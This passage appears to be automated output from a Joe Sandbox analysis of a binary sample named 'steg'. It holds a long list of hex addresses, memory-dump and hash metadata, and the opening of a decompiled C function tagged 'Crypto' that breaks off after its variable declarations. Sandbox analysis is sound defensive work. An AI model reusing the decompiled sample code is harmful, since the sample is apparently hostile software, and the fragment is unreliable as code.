                                                                                                                    0x00f9ef99
                                                                                                                    0x00f9ef9c
                                                                                                                    0x00f9efa7
                                                                                                                    0x00f9efa7
                                                                                                                    0x00f9efaa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9efd7
                                                                                                                    0x00f9efe4
                                                                                                                    0x00f9efe6
                                                                                                                    0x00f9efe9
                                                                                                                    0x00f9efea
                                                                                                                    0x00f9efed
                                                                                                                    0x00f9efef
                                                                                                                    0x00000000
                                                                                                                    0x00f9eff1
                                                                                                                    0x00000000
                                                                                                                    0x00f9eff1
                                                                                                                    0x00000000
                                                                                                                    0x00f9efef
                                                                                                                    0x00f9efa7
                                                                                                                    0x00f9ef9c
                                                                                                                    0x00f9ef91
                                                                                                                    0x00000000
                                                                                                                    0x00f9ecf7
                                                                                                                    0x00f9ecf7
                                                                                                                    0x00f9ecfa
                                                                                                                    0x00f9ecff
                                                                                                                    0x00000000
                                                                                                                    0x00f9ed05
                                                                                                                    0x00f9ed09
                                                                                                                    0x00f9ed0d
                                                                                                                    0x00000000
                                                                                                                    0x00f9ed13
                                                                                                                    0x00f9ed13
                                                                                                                    0x00f9ed16
                                                                                                                    0x00f9ed1c
                                                                                                                    0x00f9ed28
                                                                                                                    0x00f9ed36
                                                                                                                    0x00f9ed48
                                                                                                                    0x00f9ed5e
                                                                                                                    0x00f9ed66
                                                                                                                    0x00f9ed77
                                                                                                                    0x00f9ed7c
                                                                                                                    0x00f9ed80
                                                                                                                    0x00f9ed83
                                                                                                                    0x00f9ed8b
                                                                                                                    0x00f9ed8e
                                                                                                                    0x00f9ed92
                                                                                                                    0x00f9eda4
                                                                                                                    0x00f9eda4
                                                                                                                    0x00f9ed94
                                                                                                                    0x00f9ed94
                                                                                                                    0x00f9ed9a
                                                                                                                    0x00f9ed9c
                                                                                                                    0x00f9ed9f
                                                                                                                    0x00f9ed9f
                                                                                                                    0x00f9eda6
                                                                                                                    0x00f9eda8
                                                                                                                    0x00f9edbd
                                                                                                                    0x00f9e598
                                                                                                                    0x00f9e598
                                                                                                                    0x00f9e598
                                                                                                                    0x00000000
                                                                                                                    0x00f9eda8
                                                                                                                    0x00f9ed0d
                                                                                                                    0x00f9ecff
                                                                                                                    0x00f9ebc2
                                                                                                                    0x00f9ebc7
                                                                                                                    0x00f9ebce
                                                                                                                    0x00f9ebd2
                                                                                                                    0x00f9ebda
                                                                                                                    0x00f9ebef
                                                                                                                    0x00f9ebf4
                                                                                                                    0x00f9ebf6
                                                                                                                    0x00f9ebf9
                                                                                                                    0x00f9ebfc
                                                                                                                    0x00000000
                                                                                                                    0x00f9ec02
                                                                                                                    0x00f9ec08
                                                                                                                    0x00f9ec11
                                                                                                                    0x00f9ec18
                                                                                                                    0x00f9ec1e
                                                                                                                    0x00f9ec21
                                                                                                                    0x00f9ec23
                                                                                                                    0x00f9ec27
                                                                                                                    0x00f9ec2a
                                                                                                                    0x00f9ec36
                                                                                                                    0x00f9ec3a
                                                                                                                    0x00f9ec74
                                                                                                                    0x00f9ec77
                                                                                                                    0x00f9ec7a
                                                                                                                    0x00f9ec80
                                                                                                                    0x00f9ec85
                                                                                                                    0x00f9ec88
                                                                                                                    0x00000000
                                                                                                                    0x00f9ec88
                                                                                                                    0x00f9ec3c
                                                                                                                    0x00f9ec46
                                                                                                                    0x00f9ec4b
                                                                                                                    0x00f9ec5f
                                                                                                                    0x00f9ec65
                                                                                                                    0x00f9ec6a
                                                                                                                    0x00f9ec6d
                                                                                                                    0x00f9ec6d
                                                                                                                    0x00f9ec70
                                                                                                                    0x00f9ec70
                                                                                                                    0x00f9ec2c
                                                                                                                    0x00f9ec2c
                                                                                                                    0x00f9ec31
                                                                                                                    0x00f9ec8b
                                                                                                                    0x00f9ec8b
                                                                                                                    0x00f9ec8b
                                                                                                                    0x00f9ec91
                                                                                                                    0x00f9ec94
                                                                                                                    0x00f9eca3
                                                                                                                    0x00f9eca5
                                                                                                                    0x00f9eca8
                                                                                                                    0x00f9ecab
                                                                                                                    0x00f9ecad
                                                                                                                    0x00000000
                                                                                                                    0x00f9ecb3
                                                                                                                    0x00f9ecb3
                                                                                                                    0x00f9ecb4
                                                                                                                    0x00f9ecb4
                                                                                                                    0x00f9ecb5
                                                                                                                    0x00000000
                                                                                                                    0x00f9ecb5
                                                                                                                    0x00f9ecad
                                                                                                                    0x00000000
                                                                                                                    0x00f9ecb8
                                                                                                                    0x00f9ecbb
                                                                                                                    0x00f9ecbc
                                                                                                                    0x00f9ecbf
                                                                                                                    0x00f9ecbf
                                                                                                                    0x00f9ecc8
                                                                                                                    0x00000000
                                                                                                                    0x00f9ecc8
                                                                                                                    0x00f9e9c7
                                                                                                                    0x00f9e9c7
                                                                                                                    0x00f9e9c7
                                                                                                                    0x00f9e9d5
                                                                                                                    0x00f9e9da
                                                                                                                    0x00f9e9dd
                                                                                                                    0x00f9e9e0
                                                                                                                    0x00f9e9e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9e9e8
                                                                                                                    0x00f9e9ea
                                                                                                                    0x00f9e9f0
                                                                                                                    0x00f9e9f3
                                                                                                                    0x00f9e9f5
                                                                                                                    0x00f9e9fb
                                                                                                                    0x00f9e9fb
                                                                                                                    0x00f9e9fb
                                                                                                                    0x00f9e9ff
                                                                                                                    0x00f9e9ff
                                                                                                                    0x00f9ea02
                                                                                                                    0x00f9ea08
                                                                                                                    0x00f9ea0b
                                                                                                                    0x00f9ea0e
                                                                                                                    0x00f9ea12
                                                                                                                    0x00f9ea42
                                                                                                                    0x00f9ea42
                                                                                                                    0x00f9ea45
                                                                                                                    0x00f9ea48
                                                                                                                    0x00f9ea4a
                                                                                                                    0x00f9ea4a
                                                                                                                    0x00f9ea4d
                                                                                                                    0x00f9ea4f
                                                                                                                    0x00f9ea57
                                                                                                                    0x00f9ea57
                                                                                                                    0x00f9ea5b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9ea5d
                                                                                                                    0x00f9ea60
                                                                                                                    0x00f9ea62
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9ea62
                                                                                                                    0x00f9ea57
                                                                                                                    0x00f9ea64
                                                                                                                    0x00f9ea64
                                                                                                                    0x00f9ea64
                                                                                                                    0x00f9ea67
                                                                                                                    0x00f9ea67
                                                                                                                    0x00f9ea6a
                                                                                                                    0x00f9ea6a
                                                                                                                    0x00f9ea6d
                                                                                                                    0x00f9ea6f
                                                                                                                    0x00f9ea76
                                                                                                                    0x00f9ea71
                                                                                                                    0x00f9ea71
                                                                                                                    0x00f9ea71
                                                                                                                    0x00f9ea79
                                                                                                                    0x00f9ea79
                                                                                                                    0x00f9ea7c
                                                                                                                    0x00f9ea7c
                                                                                                                    0x00f9ea7f
                                                                                                                    0x00f9ea81
                                                                                                                    0x00f9ea88
                                                                                                                    0x00f9ea83
                                                                                                                    0x00f9ea83
                                                                                                                    0x00f9ea83
                                                                                                                    0x00f9ea8a
                                                                                                                    0x00f9ea8a
                                                                                                                    0x00f9ea8d
                                                                                                                    0x00f9ea94
                                                                                                                    0x00f9ea9b
                                                                                                                    0x00f9ea9d
                                                                                                                    0x00f9eaa0
                                                                                                                    0x00f9eaa2
                                                                                                                    0x00f9eaa4
                                                                                                                    0x00f9eaa4
                                                                                                                    0x00f9eaa7
                                                                                                                    0x00f9eaab
                                                                                                                    0x00f9eaad
                                                                                                                    0x00f9eaaf
                                                                                                                    0x00f9eaaf
                                                                                                                    0x00f9eab2
                                                                                                                    0x00f9eab6
                                                                                                                    0x00f9eab9
                                                                                                                    0x00f9eabb
                                                                                                                    0x00f9eabf
                                                                                                                    0x00f9eac1
                                                                                                                    0x00f9eac1
                                                                                                                    0x00f9eabf
                                                                                                                    0x00f9ea14
                                                                                                                    0x00f9ea14
                                                                                                                    0x00f9ea14
                                                                                                                    0x00f9ea17
                                                                                                                    0x00f9ea1b
                                                                                                                    0x00f9ea21
                                                                                                                    0x00f9ea25
                                                                                                                    0x00f9ea27
                                                                                                                    0x00f9ea27
                                                                                                                    0x00f9ea34
                                                                                                                    0x00f9ea3a
                                                                                                                    0x00f9ea3a
                                                                                                                    0x00f9ea1b
                                                                                                                    0x00f9ea12
                                                                                                                    0x00f9eac4
                                                                                                                    0x00f9eaca
                                                                                                                    0x00f9eace
                                                                                                                    0x00f9ead0
                                                                                                                    0x00f9ead4
                                                                                                                    0x00f9eae4
                                                                                                                    0x00f9eae4
                                                                                                                    0x00f9eae8
                                                                                                                    0x00f9eaea
                                                                                                                    0x00f9eaee
                                                                                                                    0x00f9eaf0
                                                                                                                    0x00f9eaf5
                                                                                                                    0x00f9eaf7
                                                                                                                    0x00f9eaf9
                                                                                                                    0x00f9eaf9
                                                                                                                    0x00f9eafc
                                                                                                                    0x00f9eb01
                                                                                                                    0x00f9eb06
                                                                                                                    0x00f9eb09
                                                                                                                    0x00f9eb0b
                                                                                                                    0x00f9eb0d
                                                                                                                    0x00f9eb0d
                                                                                                                    0x00f9eb0b
                                                                                                                    0x00f9eaee
                                                                                                                    0x00f9eb10
                                                                                                                    0x00f9eb15
                                                                                                                    0x00f9ead6
                                                                                                                    0x00f9ead6
                                                                                                                    0x00f9eada
                                                                                                                    0x00f9eadc
                                                                                                                    0x00000000
                                                                                                                    0x00f9eade
                                                                                                                    0x00f9eade
                                                                                                                    0x00f9eae2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9eae2
                                                                                                                    0x00f9eadc
                                                                                                                    0x00f9eada
                                                                                                                    0x00f9ead4
                                                                                                                    0x00f9eace
                                                                                                                    0x00f9e9f5
                                                                                                                    0x00f9eb18
                                                                                                                    0x00f9eb23
                                                                                                                    0x00f9eb24
                                                                                                                    0x00f9eb26
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9eb26
                                                                                                                    0x00000000
                                                                                                                    0x00f9e9c7
                                                                                                                    0x00f9e912
                                                                                                                    0x00f9e917
                                                                                                                    0x00f9e917
                                                                                                                    0x00f9e91a
                                                                                                                    0x00f9e967
                                                                                                                    0x00f9e969
                                                                                                                    0x00f9e96c
                                                                                                                    0x00f9e96f
                                                                                                                    0x00f9e971
                                                                                                                    0x00000000
                                                                                                                    0x00f9e977
                                                                                                                    0x00f9e977
                                                                                                                    0x00f9e97a
                                                                                                                    0x00f9e97d
                                                                                                                    0x00f9e980
                                                                                                                    0x00f9e984
                                                                                                                    0x00f9e988
                                                                                                                    0x00f9e9ab
                                                                                                                    0x00f9e9ae
                                                                                                                    0x00000000
                                                                                                                    0x00f9e98a
                                                                                                                    0x00f9e99b
                                                                                                                    0x00f9e99d
                                                                                                                    0x00f9e9a0
                                                                                                                    0x00f9e9a3
                                                                                                                    0x00f9e9a5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9e9a5
                                                                                                                    0x00f9e988
                                                                                                                    0x00f9e91c
                                                                                                                    0x00f9e91c
                                                                                                                    0x00f9e923
                                                                                                                    0x00f9e92a
                                                                                                                    0x00f9e92d
                                                                                                                    0x00f9e938
                                                                                                                    0x00f9e93d
                                                                                                                    0x00f9e940
                                                                                                                    0x00f9e942
                                                                                                                    0x00f9e945
                                                                                                                    0x00f9e948
                                                                                                                    0x00f9e94a
                                                                                                                    0x00000000
                                                                                                                    0x00f9e950
                                                                                                                    0x00000000
                                                                                                                    0x00f9e950
                                                                                                                    0x00f9e94a
                                                                                                                    0x00000000
                                                                                                                    0x00f9e9b1
                                                                                                                    0x00f9e9b1
                                                                                                                    0x00f9e9b2
                                                                                                                    0x00f9e9b2
                                                                                                                    0x00000000
                                                                                                                    0x00f9e917
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9e80c
                                                                                                                    0x00f9e80c
                                                                                                                    0x00f9e817
                                                                                                                    0x00f9e817
                                                                                                                    0x00f9e81e
                                                                                                                    0x00f9e820
                                                                                                                    0x00f9e822
                                                                                                                    0x00000000
                                                                                                                    0x00f9e824
                                                                                                                    0x00f9e826
                                                                                                                    0x00f9e82a
                                                                                                                    0x00f9e82e
                                                                                                                    0x00f9e832
                                                                                                                    0x00f9e834
                                                                                                                    0x00f9e834
                                                                                                                    0x00f9e834
                                                                                                                    0x00f9e835
                                                                                                                    0x00f9e836
                                                                                                                    0x00f9e838
                                                                                                                    0x00f9e83b
                                                                                                                    0x00f9e8f3
                                                                                                                    0x00f9e8f3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9e83b
                                                                                                                    0x00000000
                                                                                                                    0x00f9e841
                                                                                                                    0x00f9e841
                                                                                                                    0x00f9e842
                                                                                                                    0x00f9e842
                                                                                                                    0x00000000
                                                                                                                    0x00f9e817
                                                                                                                    0x00f9e64d
                                                                                                                    0x00f9e64d
                                                                                                                    0x00000000
                                                                                                                    0x00f9e64d
                                                                                                                    0x00f9f36b
                                                                                                                    0x00f9f371
                                                                                                                    0x00f9f373
                                                                                                                    0x00f9f37e
                                                                                                                    0x00000000
                                                                                                                    0x00f9f37e
                                                                                                                    0x00f9e59b
                                                                                                                    0x00f9e59e
                                                                                                                    0x00f9e5a3
                                                                                                                    0x00f9e5a5
                                                                                                                    0x00f9e5a8
                                                                                                                    0x00f9e5ab
                                                                                                                    0x00f9e5b7
                                                                                                                    0x00f9e5b7
                                                                                                                    0x00f9e5be
                                                                                                                    0x00f9e5c0
                                                                                                                    0x00f9e5c6
                                                                                                                    0x00f9e5c9
                                                                                                                    0x00f9e5cb
                                                                                                                    0x00f9e5d1
                                                                                                                    0x00f9e5d1
                                                                                                                    0x00f9e5d1
                                                                                                                    0x00f9e5d5
                                                                                                                    0x00f9e5d5
                                                                                                                    0x00f9e5d8
                                                                                                                    0x00f9e5de
                                                                                                                    0x00f9e5e1
                                                                                                                    0x00f9e5e4
                                                                                                                    0x00f9e5e8
                                                                                                                    0x00f9eff6
                                                                                                                    0x00f9eff6
                                                                                                                    0x00f9eff9
                                                                                                                    0x00f9effc
                                                                                                                    0x00f9effe
                                                                                                                    0x00f9effe
                                                                                                                    0x00f9f001
                                                                                                                    0x00f9f003
                                                                                                                    0x00f9f007
                                                                                                                    0x00f9f007
                                                                                                                    0x00f9f00b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9f00d
                                                                                                                    0x00f9f010
                                                                                                                    0x00f9f012
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9f012
                                                                                                                    0x00f9f007
                                                                                                                    0x00f9f014
                                                                                                                    0x00f9f014
                                                                                                                    0x00f9f014
                                                                                                                    0x00f9f017
                                                                                                                    0x00f9f017
                                                                                                                    0x00f9f01a
                                                                                                                    0x00f9f01a
                                                                                                                    0x00f9f01d
                                                                                                                    0x00f9f01f
                                                                                                                    0x00f9f026
                                                                                                                    0x00f9f021
                                                                                                                    0x00f9f021
                                                                                                                    0x00f9f021
                                                                                                                    0x00f9f029
                                                                                                                    0x00f9f029
                                                                                                                    0x00f9f02c
                                                                                                                    0x00f9f02c
                                                                                                                    0x00f9f02f
                                                                                                                    0x00f9f031
                                                                                                                    0x00f9f038
                                                                                                                    0x00f9f033
                                                                                                                    0x00f9f033
                                                                                                                    0x00f9f033
                                                                                                                    0x00f9f03a
                                                                                                                    0x00f9f03a
                                                                                                                    0x00f9f03d
                                                                                                                    0x00f9f044
                                                                                                                    0x00f9f04b
                                                                                                                    0x00f9f04d
                                                                                                                    0x00f9f050
                                                                                                                    0x00f9f052
                                                                                                                    0x00f9f054
                                                                                                                    0x00f9f054
                                                                                                                    0x00f9f057
                                                                                                                    0x00f9f05b
                                                                                                                    0x00f9f05d
                                                                                                                    0x00f9f05f
                                                                                                                    0x00f9f05f
                                                                                                                    0x00f9f062
                                                                                                                    0x00f9f066
                                                                                                                    0x00f9f068
                                                                                                                    0x00f9f06c
                                                                                                                    0x00f9f06e
                                                                                                                    0x00f9f06e
                                                                                                                    0x00f9f06c
                                                                                                                    0x00f9e5ee
                                                                                                                    0x00f9e5ee
                                                                                                                    0x00f9e5ee
                                                                                                                    0x00f9e5f1
                                                                                                                    0x00f9e5f5
                                                                                                                    0x00f9e5fb
                                                                                                                    0x00f9e5ff
                                                                                                                    0x00f9e601
                                                                                                                    0x00f9e601
                                                                                                                    0x00f9e60e
                                                                                                                    0x00f9e614
                                                                                                                    0x00f9e614
                                                                                                                    0x00f9e5f5
                                                                                                                    0x00f9e5e8
                                                                                                                    0x00f9f071
                                                                                                                    0x00f9f077
                                                                                                                    0x00f9f07b
                                                                                                                    0x00f9f081
                                                                                                                    0x00f9f085
                                                                                                                    0x00f9f09d
                                                                                                                    0x00f9f09d
                                                                                                                    0x00f9f0a1
                                                                                                                    0x00f9f0a3
                                                                                                                    0x00f9f0a7
                                                                                                                    0x00f9f0a9
                                                                                                                    0x00f9f0ae
                                                                                                                    0x00f9f0b0
                                                                                                                    0x00f9f0b2
                                                                                                                    0x00f9f0b2
                                                                                                                    0x00f9f0b5
                                                                                                                    0x00f9f0ba
                                                                                                                    0x00f9f0bf
                                                                                                                    0x00f9f0c2
                                                                                                                    0x00f9f0c4
                                                                                                                    0x00f9f0c6
                                                                                                                    0x00f9f0c6
                                                                                                                    0x00f9f0c4
                                                                                                                    0x00f9f0a7
                                                                                                                    0x00f9f0c8
                                                                                                                    0x00f9f0cc
                                                                                                                    0x00f9f0d2
                                                                                                                    0x00f9f0d5
                                                                                                                    0x00f9f0d7
                                                                                                                    0x00f9f0d9
                                                                                                                    0x00f9f0df
                                                                                                                    0x00f9f0e1
                                                                                                                    0x00f9f0e4
                                                                                                                    0x00f9f0e4
                                                                                                                    0x00f9f0ed
                                                                                                                    0x00f9f0f3
                                                                                                                    0x00f9f0fa
                                                                                                                    0x00f9f0ff
                                                                                                                    0x00f9f102
                                                                                                                    0x00f9f106
                                                                                                                    0x00f9f108
                                                                                                                    0x00f9f10b
                                                                                                                    0x00f9f10d
                                                                                                                    0x00f9f119
                                                                                                                    0x00f9f11b
                                                                                                                    0x00f9f11e
                                                                                                                    0x00f9f120
                                                                                                                    0x00f9f122
                                                                                                                    0x00f9f122
                                                                                                                    0x00f9f10f
                                                                                                                    0x00f9f10f
                                                                                                                    0x00f9f10f
                                                                                                                    0x00f9f125
                                                                                                                    0x00f9f129
                                                                                                                    0x00f9f12b
                                                                                                                    0x00f9f12d
                                                                                                                    0x00f9f12f
                                                                                                                    0x00f9f12f
                                                                                                                    0x00f9f132
                                                                                                                    0x00f9f136
                                                                                                                    0x00f9f138
                                                                                                                    0x00f9f13e
                                                                                                                    0x00f9f140
                                                                                                                    0x00f9f147
                                                                                                                    0x00f9f14e
                                                                                                                    0x00f9f151
                                                                                                                    0x00f9f151
                                                                                                                    0x00f9f15d
                                                                                                                    0x00f9f162
                                                                                                                    0x00f9f165
                                                                                                                    0x00f9f165
                                                                                                                    0x00f9f136
                                                                                                                    0x00f9f169
                                                                                                                    0x00f9f16d
                                                                                                                    0x00f9f16d
                                                                                                                    0x00f9f087
                                                                                                                    0x00f9f087
                                                                                                                    0x00f9f08b
                                                                                                                    0x00f9f091
                                                                                                                    0x00000000
                                                                                                                    0x00f9f093
                                                                                                                    0x00f9f093
                                                                                                                    0x00f9f097
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9f097
                                                                                                                    0x00f9f091
                                                                                                                    0x00f9f08b
                                                                                                                    0x00f9f085
                                                                                                                    0x00f9f07b
                                                                                                                    0x00f9e5cb
                                                                                                                    0x00f9f171
                                                                                                                    0x00f9f172
                                                                                                                    0x00f9f172
                                                                                                                    0x00f9e5b7
                                                                                                                    0x00f9f17b
                                                                                                                    0x00f9f17d
                                                                                                                    0x00f9f180
                                                                                                                    0x00f9f187
                                                                                                                    0x00f9f187
                                                                                                                    0x00f9f18b
                                                                                                                    0x00f9f18d
                                                                                                                    0x00f9f193
                                                                                                                    0x00f9f196
                                                                                                                    0x00f9f198
                                                                                                                    0x00f9f19e
                                                                                                                    0x00f9f19e
                                                                                                                    0x00f9f19e
                                                                                                                    0x00f9f1a2
                                                                                                                    0x00f9f1a2
                                                                                                                    0x00f9f1a5
                                                                                                                    0x00f9f1ab
                                                                                                                    0x00f9f1ae
                                                                                                                    0x00f9f1b1
                                                                                                                    0x00f9f1b5
                                                                                                                    0x00f9f1e2
                                                                                                                    0x00f9f1e2
                                                                                                                    0x00f9f1e5
                                                                                                                    0x00f9f1e8
                                                                                                                    0x00f9f1ea
                                                                                                                    0x00f9f1ea
                                                                                                                    0x00f9f1ed
                                                                                                                    0x00f9f1ef
                                                                                                                    0x00f9f1f7
                                                                                                                    0x00f9f1f7
                                                                                                                    0x00f9f1fb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9f1fd
                                                                                                                    0x00f9f200
                                                                                                                    0x00f9f202
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9f202
                                                                                                                    0x00f9f1f7
                                                                                                                    0x00f9f204
                                                                                                                    0x00f9f204
                                                                                                                    0x00f9f204
                                                                                                                    0x00f9f207
                                                                                                                    0x00f9f207
                                                                                                                    0x00f9f20a
                                                                                                                    0x00f9f20a
                                                                                                                    0x00f9f20d
                                                                                                                    0x00f9f20f
                                                                                                                    0x00f9f216
                                                                                                                    0x00f9f211
                                                                                                                    0x00f9f211
                                                                                                                    0x00f9f211
                                                                                                                    0x00f9f219
                                                                                                                    0x00f9f219
                                                                                                                    0x00f9f21c
                                                                                                                    0x00f9f21c
                                                                                                                    0x00f9f21f
                                                                                                                    0x00f9f221
                                                                                                                    0x00f9f228
                                                                                                                    0x00f9f223
                                                                                                                    0x00f9f223
                                                                                                                    0x00f9f223
                                                                                                                    0x00f9f22a
                                                                                                                    0x00f9f22a
                                                                                                                    0x00f9f22d
                                                                                                                    0x00f9f234
                                                                                                                    0x00f9f23b
                                                                                                                    0x00f9f23d
                                                                                                                    0x00f9f240
                                                                                                                    0x00f9f242
                                                                                                                    0x00f9f244
                                                                                                                    0x00f9f244
                                                                                                                    0x00f9f247
                                                                                                                    0x00f9f24b
                                                                                                                    0x00f9f24d
                                                                                                                    0x00f9f24f
                                                                                                                    0x00f9f24f
                                                                                                                    0x00f9f252
                                                                                                                    0x00f9f256
                                                                                                                    0x00f9f258
                                                                                                                    0x00f9f25c
                                                                                                                    0x00f9f25e
                                                                                                                    0x00f9f25e
                                                                                                                    0x00f9f25c
                                                                                                                    0x00f9f1b7
                                                                                                                    0x00f9f1b7
                                                                                                                    0x00f9f1b7
                                                                                                                    0x00f9f1ba
                                                                                                                    0x00f9f1be
                                                                                                                    0x00f9f1c4
                                                                                                                    0x00f9f1c8
                                                                                                                    0x00f9f1ca
                                                                                                                    0x00f9f1ca
                                                                                                                    0x00f9f1d7
                                                                                                                    0x00f9f1dd
                                                                                                                    0x00f9f1dd
                                                                                                                    0x00f9f1be
                                                                                                                    0x00f9f1b5
                                                                                                                    0x00f9f261
                                                                                                                    0x00f9f267
                                                                                                                    0x00f9f26b
                                                                                                                    0x00f9f271
                                                                                                                    0x00f9f275
                                                                                                                    0x00f9f28d
                                                                                                                    0x00f9f28d
                                                                                                                    0x00f9f291
                                                                                                                    0x00f9f293
                                                                                                                    0x00f9f297
                                                                                                                    0x00f9f299
                                                                                                                    0x00f9f29e
                                                                                                                    0x00f9f2a0
                                                                                                                    0x00f9f2a2
                                                                                                                    0x00f9f2a2
                                                                                                                    0x00f9f2a5
                                                                                                                    0x00f9f2aa
                                                                                                                    0x00f9f2af
                                                                                                                    0x00f9f2b2
                                                                                                                    0x00f9f2b4
                                                                                                                    0x00f9f2b6
                                                                                                                    0x00f9f2b6
                                                                                                                    0x00f9f2b4
                                                                                                                    0x00f9f297
                                                                                                                    0x00f9f2b8
                                                                                                                    0x00f9f2bc
                                                                                                                    0x00f9f2c2
                                                                                                                    0x00f9f2c5
                                                                                                                    0x00f9f2c7
                                                                                                                    0x00f9f2c9
                                                                                                                    0x00f9f2cf
                                                                                                                    0x00f9f2d1
                                                                                                                    0x00f9f2d4
                                                                                                                    0x00f9f2d4
                                                                                                                    0x00f9f2dd
                                                                                                                    0x00f9f2e3
                                                                                                                    0x00f9f2ea
                                                                                                                    0x00f9f2ef
                                                                                                                    0x00f9f2f2
                                                                                                                    0x00f9f2f6
                                                                                                                    0x00f9f2f8
                                                                                                                    0x00f9f2fb
                                                                                                                    0x00f9f2fd
                                                                                                                    0x00f9f309
                                                                                                                    0x00f9f30b
                                                                                                                    0x00f9f30e
                                                                                                                    0x00f9f310
                                                                                                                    0x00f9f312
                                                                                                                    0x00f9f312
                                                                                                                    0x00f9f2ff
                                                                                                                    0x00f9f2ff
                                                                                                                    0x00f9f2ff
                                                                                                                    0x00f9f315
                                                                                                                    0x00f9f319
                                                                                                                    0x00f9f31b
                                                                                                                    0x00f9f31d
                                                                                                                    0x00f9f31f
                                                                                                                    0x00f9f31f
                                                                                                                    0x00f9f322
                                                                                                                    0x00f9f326
                                                                                                                    0x00f9f328
                                                                                                                    0x00f9f32e
                                                                                                                    0x00f9f330
                                                                                                                    0x00f9f337
                                                                                                                    0x00f9f33e
                                                                                                                    0x00f9f341
                                                                                                                    0x00f9f341
                                                                                                                    0x00f9f34d
                                                                                                                    0x00f9f352
                                                                                                                    0x00f9f355
                                                                                                                    0x00f9f355
                                                                                                                    0x00f9f326
                                                                                                                    0x00f9f359
                                                                                                                    0x00f9f35d
                                                                                                                    0x00f9f35d
                                                                                                                    0x00f9f277
                                                                                                                    0x00f9f277
                                                                                                                    0x00f9f27b
                                                                                                                    0x00f9f281
                                                                                                                    0x00000000
                                                                                                                    0x00f9f283
                                                                                                                    0x00f9f283
                                                                                                                    0x00f9f287
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f9f287
                                                                                                                    0x00f9f281
                                                                                                                    0x00f9f27b
                                                                                                                    0x00f9f275
                                                                                                                    0x00f9f26b
                                                                                                                    0x00f9f198
                                                                                                                    0x00f9f361
                                                                                                                    0x00f9f362
                                                                                                                    0x00f9f362
                                                                                                                    0x00f9f187
                                                                                                                    0x00000000
                                                                                                                    0x00f9e37b
                                                                                                                    0x00f9e38c
                                                                                                                    0x00f9e38c
                                                                                                                    0x00000000

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 90c425c597f44cae2b7a7896312ee01b0557435b2d20e8744368b301e1b1cc02
                                                                                                                    • Instruction ID: ce94115a0c13d2a3634fb7b409f2fd72a90d4fbb44190620154617078cc9d55e
                                                                                                                    • Opcode Fuzzy Hash: 90c425c597f44cae2b7a7896312ee01b0557435b2d20e8744368b301e1b1cc02
                                                                                                                    • Instruction Fuzzy Hash: C5C27F70E002558FEF24CFA9C880BADBBF1BF44314F19816DE8599B252E735E946EB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FC46C7 Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 1339COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E00FC46C7(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, signed int _a32, intOrPtr _a36, intOrPtr* _a40) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v43;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				intOrPtr _t836;
				intOrPtr _t837;
				intOrPtr _t839;
				intOrPtr* _t840;
				signed int _t842;
				intOrPtr _t843;
				intOrPtr _t845;
				unsigned int _t846;
				intOrPtr _t853;
				unsigned int _t854;
				intOrPtr _t855;
				intOrPtr _t860;
				signed int _t861;
				signed int _t862;
				signed char _t863;
				signed char _t864;
				unsigned int _t867;
				unsigned int _t871;
				signed int _t876;
				intOrPtr _t879;
				signed int _t880;
				unsigned int _t881;
				intOrPtr _t882;
				unsigned int _t884;
				intOrPtr _t885;
				signed int _t886;
				signed int _t887;
				void* _t888;
				signed int _t892;
				signed int _t896;
				signed int _t899;
				signed int _t903;
				unsigned int _t912;
				intOrPtr _t913;
				intOrPtr _t916;
				intOrPtr _t919;
				intOrPtr _t922;
				signed int _t930;
				signed int _t932;
				signed int _t935;
				signed int _t936;
				signed int _t940;
				intOrPtr _t944;
				intOrPtr _t947;
				intOrPtr _t952;
				intOrPtr _t961;
				void* _t962;
				signed int _t967;
				signed int _t971;
				signed int _t974;
				signed int _t978;
				intOrPtr _t982;
				signed int _t983;
				signed int _t987;
				signed int _t990;
				signed int _t994;
				intOrPtr _t998;
				unsigned int _t999;
				signed int _t1003;
				signed int _t1007;
				intOrPtr _t1010;
				signed int _t1011;
